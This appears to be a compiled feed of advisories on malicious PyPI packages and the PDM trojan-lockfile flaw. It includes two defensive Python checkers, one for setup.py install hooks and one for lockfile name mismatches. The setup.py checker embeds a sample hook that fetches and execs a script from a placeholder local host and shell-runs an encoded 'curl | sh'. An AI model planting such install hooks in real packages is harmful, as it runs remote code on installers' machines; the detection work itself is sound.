Malicious code in sparklog (PyPI)
Source: ossf-package-analysis fa3ac41199a392a32d649e60da4ff9d98d6ceb0d956297d976ce3b5dc948dc91. The OpenSSF Package Analysis project identified 'sparklog' @ 0.0.3 (PyPI) as malicious. It is considered malicious because: - The package executes...
Malicious code in lyft-exceptions (PyPI)
Source: ossf-package-analysis 5e0290aaa0cb90a501cb0a0b357f32d3e725f6f3a97541cbc2796671ea4e8f60. The OpenSSF Package Analysis project identified 'lyft-exceptions' @ 5.9.1 (PyPI) as malicious. It is considered malicious because: - The package...
PT-2024-22768 · Unknown +1 · Filecachetools +1
Vulnerable software and affected versions: Rocket.Chat.Audit through commit 5ad78e8. Description: Rocket.Chat.Audit declares a dependency on filecachetools, a name that is not registered on PyPI. An unclaimed dependency name is a package-hijacking (dependency confusion) risk: whoever registers that name on the public index gets their code installed by anyone resolving Rocket.Chat.Audit's requirements. The advisory states that this situation may lead to potential security risks due to the missing dependency...
Malicious code in pyalicet (PyPI)
Source: ossf-package-analysis 96a6abcd56ea94e027d0d68089a1b6f29312c009aa9be7d80c4b0e33bf0e6396. The OpenSSF Package Analysis project identified 'pyalicet' @ 0.0.3 (PyPI) as malicious. It is considered malicious because: - The package...
Malicious code in djanggo (PyPI)
Source: ossf-package-analysis 011da0e2a451e787d1c7b54c29f3090de47bd2366de80983667665a70d885320. The OpenSSF Package Analysis project identified 'djanggo' @ 0.0.6 (PyPI) as malicious. It is considered malicious because: - The package...
Crypto Stealing PyPI Malware Hits Both Windows and Linux Users
By Deeba Ahmed (HackRead.com). FortiGuard Labs' latest research report reveals a concerning trend: threat actors are leveraging the Python Package Index (PyPI) to distribute cryptocurrency-stealing malware that targets both Windows and Linux users...
Malicious code in richcolor (PyPI)
Source: kam193 50d5904bd379a75fd43115d7339df3d79f87ec691026774160b15b8632a9f8ae. Packages either test the malicious behaviour, or actually download and run a simple remote script during the installation. Category: PROBABLYPENTEST -...
Malicious code in excaliburx (PyPI)
Source: kam193 1d763da65172935a20c3b03c65deff16a2eb251d857d1fc34e4cc67b72f7610a. Packages either test the malicious behaviour, or actually download and run a simple remote script during the installation. Category: PROBABLYPENTEST -...
Malicious code in enchantv (PyPI)
Source: kam193 f578b605e73b68aae8c1d8a9bd3f55b810839b2bccd720bccc7f887c2e0046c8. Packages either test the malicious behaviour, or actually download and run a simple remote script during the installation. Category: PROBABLYPENTEST -...
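The three kam193 entries above share one pattern: the package runs code during installation (typically a setuptools command override that fetches and executes a remote script). The following is an added example, not code from any of these reports or from the kam193 or OpenSSF projects: a small static scanner that parses a setup.py with Python's `ast` module and flags install-time command overrides, a `cmdclass` argument to `setup()`, and calls to network, decoding and process-execution functions. The sample setup.py it scans is constructed for illustration; the URL and the base64 string in it are placeholders, not indicators from any real package.

```python
import ast

# Constructed sample of the install-time pattern: a setuptools command override that
# downloads and runs a remote script when `pip install` runs. Placeholder URL/payload.
MALICIOUS_SETUP_PY = '''
import base64, subprocess, urllib.request
from setuptools import setup
from setuptools.command.install import install

class PostInstall(install):
    def run(self):
        install.run(self)
        code = urllib.request.urlopen("http://127.0.0.1:8000/stage2.py").read()
        exec(code)
        cmd = base64.b64decode("Y3VybCAtcyBodHRwOi8vMTI3LjAuMC4xL3guc2ggfCBzaA==").decode()
        subprocess.call(cmd, shell=True)

setup(name="examplepkg", version="0.1", cmdclass={"install": PostInstall})
'''

BENIGN_SETUP_PY = '''
from setuptools import setup
setup(name="goodpkg", version="1.0", packages=["goodpkg"])
'''

# setuptools commands whose override gives the package code execution at install time
INSTALL_COMMANDS = {"install", "develop", "egg_info", "build_py", "build_ext", "sdist"}

# fully qualified callables that have no business in a setup.py
DANGEROUS_CALLS = {
    "exec", "eval", "builtins.exec", "builtins.eval",
    "os.system", "os.popen", "subprocess.call", "subprocess.run",
    "subprocess.Popen", "subprocess.check_output", "subprocess.check_call",
    "urllib.request.urlopen", "urllib.request.urlretrieve",
    "requests.get", "requests.post", "socket.socket", "base64.b64decode",
}


def _dotted_name(node):
    """Return 'pkg.mod.attr' for a Name/Attribute chain, None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _import_aliases(tree):
    """Map names bound by import statements to the fully qualified object they refer to."""
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                bound = alias.asname or alias.name.split(".")[0]
                aliases[bound] = alias.name if alias.asname else bound
        elif isinstance(node, ast.ImportFrom) and node.module:
            for alias in node.names:
                aliases[alias.asname or alias.name] = f"{node.module}.{alias.name}"
    return aliases


def _resolve(name, aliases):
    """Rewrite the first component of a dotted name through the import aliases."""
    head, dot, rest = name.partition(".")
    return aliases.get(head, head) + dot + rest


def scan_setup_py(source):
    """Return sorted (lineno, message) findings for install-time execution patterns."""
    tree = ast.parse(source)
    aliases = _import_aliases(tree)
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.ClassDef):
            for base in node.bases:
                full = _resolve(_dotted_name(base) or "", aliases)
                if full.rsplit(".", 1)[-1] in INSTALL_COMMANDS:
                    findings.append((node.lineno, f"class {node.name} overrides setuptools command {full}"))
        elif isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name is None:
                continue
            full = _resolve(name, aliases)
            if full in DANGEROUS_CALLS:
                findings.append((node.lineno, f"call to {full}"))
            if full in ("setup", "setuptools.setup") and any(kw.arg == "cmdclass" for kw in node.keywords):
                findings.append((node.lineno, "setup() registers custom cmdclass hooks"))
    return sorted(findings)


if __name__ == "__main__":
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else None
    src = open(path).read() if path else MALICIOUS_SETUP_PY
    for lineno, msg in scan_setup_py(src):
        print(f"{path or '<sample>'}:{lineno}: {msg}")
```

Run it against an unpacked sdist before installing (`python scan.py path/to/setup.py`). A finding is not proof of malice (legitimate packages do override `build_ext`), but a `cmdclass` hook combined with network access or `exec` in a package that should need neither is exactly what the reports above describe, and is worth a manual look before `pip install` executes it for you.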
Malicious code in yelp-cgeom1 (PyPI)
Source: ossf-package-analysis f1d368f32894c442f86028103800df96e8818dd226ac82b14b5cec80a267a202. The OpenSSF Package Analysis project identified 'yelp-cgeom1' @ 0.1 (PyPI) as malicious. It is considered malicious because: - The package...
27 Malicious PyPI Packages with Thousands of Downloads Found Targeting IT Experts
An unknown threat actor has been observed publishing typosquat packages to the Python Package Index PyPI repository for nearly six months with an aim to deliver malware capable of gaining persistence, stealing sensitive data, and accessing cryptocurrency wallets for financial gain. The 27 package...
Moderate: Red Hat Security Advisory: python-pip security update
An update for python-pip is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from...
Moderate: python3.11-pip security update
pip is a package management system used to install and manage software packages written in Python. Many packages can be found in the Python Package Index (PyPI). pip is a recursive acronym that can stand for either "Pip Installs Packages" or "Pip Installs Python". Security Fixes: python: tarfile...
SUSE CVE-2023-45805
pdm is a Python package and dependency manager supporting the latest PEP standards. It's possible to craft a malicious pdm.lock file that could allow e.g. an insider or a malicious open source project to appear to depend on a trusted PyPI project, but actually install another project. A project f...
Malicious code in fbdebug (PyPI)
Source: ossf-package-analysis 2edf3045263e059e2b1599655b25cc167abecc4d1e77e5e7e8d62998b0fd9e18. The OpenSSF Package Analysis project identified 'fbdebug' @ 0.1 (PyPI) as malicious. It is considered malicious because: - The package communicate...
GHSA-J44V-MMF2-XVM9 PDM Trojan Lockfile
Summary: It's possible to craft a malicious pdm.lock file that could allow e.g. an insider or a malicious open source project to appear to depend on a trusted PyPI project, but actually install another project. Details: Project foo can be targeted by creating the project foo-2 and uploading the fil...
UBUNTU-CVE-2023-45805
pdm is a Python package and dependency manager supporting the latest PEP standards. It's possible to craft a malicious pdm.lock file that could allow e.g. an insider or a malicious open source project to appear to depend on a trusted PyPI project, but actually install another project. A project f...
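The three CVE-2023-45805 entries above describe the same trojan-lockfile trick: a `[[package]]` entry is named `foo`, but the artifacts it pins were uploaded by an attacker-controlled project such as `foo-2`, and the recorded hashes match those artifacts, so hash verification passes. The detection a practitioner wants is a name consistency check: the distribution name encoded in each wheel or sdist filename must normalise (PEP 503) to the locked package name. The code below is an added example, not PDM's own fix or code; it assumes the pdm.lock layout that `tomllib` yields (a top-level `package` list whose entries carry `name`, `version` and a `files` list of `{file, hash}` tables), and the lock content it checks is constructed, with placeholder hashes. The `foo` entry reproduces the advisory's pattern.

```python
import re

# Constructed pdm.lock content in the parsed form tomllib returns (assumed layout:
# top-level "package" list; each entry has name, version and a "files" list of
# {file, hash}). Hashes are placeholders. "foo" is the trojan from the advisory:
# the locked name is foo, but both artifacts were built from a project called foo-2.
SAMPLE_LOCK = {
    "package": [
        {"name": "requests", "version": "2.31.0", "files": [
            {"file": "requests-2.31.0-py3-none-any.whl", "hash": "sha256:" + "0" * 64},
            {"file": "requests-2.31.0.tar.gz", "hash": "sha256:" + "1" * 64},
        ]},
        {"name": "Typing_Extensions", "version": "4.8.0", "files": [
            {"file": "typing_extensions-4.8.0-py3-none-any.whl", "hash": "sha256:" + "2" * 64},
        ]},
        {"name": "foo", "version": "1.0", "files": [
            {"file": "foo_2-1.0-py3-none-any.whl", "hash": "sha256:" + "3" * 64},
            {"file": "foo-2-1.0.tar.gz", "hash": "sha256:" + "4" * 64},
        ]},
    ]
}

SDIST_EXTENSIONS = (".tar.gz", ".tar.bz2", ".zip")


def normalize(name):
    """PEP 503 normalisation: lowercase, runs of '-', '_' and '.' collapse to '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def distribution_from_filename(filename, version):
    """Return the distribution name a wheel or sdist filename claims, or None."""
    if filename.endswith(".whl"):
        # {distribution}-{version}(-{build})?-{python}-{abi}-{platform}.whl;
        # the distribution field cannot contain '-', so the first field is it.
        return filename[:-4].split("-")[0]
    for ext in SDIST_EXTENSIONS:
        if filename.endswith(ext):
            stem = filename[: -len(ext)]
            # sdist names are {name}-{version} and the name may itself contain '-',
            # so split on the version the lockfile recorded for this package.
            suffix = "-" + version
            if stem.endswith(suffix):
                return stem[: -len(suffix)]
            return None  # version in filename disagrees with the lock entry
    return None


def find_trojan_packages(lock):
    """Return (locked name, file) pairs whose artifact belongs to a different distribution."""
    problems = []
    for pkg in lock.get("package", []):
        expected = normalize(pkg["name"])
        for entry in pkg.get("files", []):
            claimed = distribution_from_filename(entry["file"], pkg["version"])
            if claimed is None or normalize(claimed) != expected:
                problems.append((pkg["name"], entry["file"]))
    return problems


def load_lock(path):
    """Parse a real pdm.lock (TOML) into the structure used above."""
    import tomllib  # Python 3.11+
    with open(path, "rb") as fh:
        return tomllib.load(fh)


if __name__ == "__main__":
    import sys
    lock = load_lock(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_LOCK
    for name, fname in find_trojan_packages(lock):
        print(f"{name}: artifact {fname} does not belong to this distribution")
```

Note why hashes alone do not catch this: the lock's `hash` values are the genuine digests of the `foo-2` artifacts, so `--require-hashes`-style verification succeeds. Only comparing the artifact's own distribution name against the locked name exposes the swap; the same check belongs in any CI step that reviews lockfile changes in pull requests.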
Malicious code in enumerate-iam-aws (PyPI)
Source: google-open-source-security 46f8fde812a7274ad1e270e0cc3a8698349365af5d85ee9b89248fa467e5bf2f. Attack targeted at users of Alibaba, AWS and Telegram via malicious packages published to PyPI. The malicious code was hidden in strategic...
Malicious code in alibabacloud-oss2 (PyPI)
Source: google-open-source-security d804868504b96ba968b7eae99df63e235a0eaa2eab4a7951ae02c98c614f1828. Attack targeted at users of Alibaba, AWS and Telegram via malicious packages published to PyPI. The malicious code was hidden in strategic...
Malicious code in alisdkcore (PyPI)
Source: google-open-source-security 456242a426a17eeaca869a5f00ee2f02d837dec5bba7da9240b6bec77c0ae8a8. Attack targeted at users of Alibaba, AWS and Telegram via malicious packages published to PyPI. The malicious code was hidden in strategic...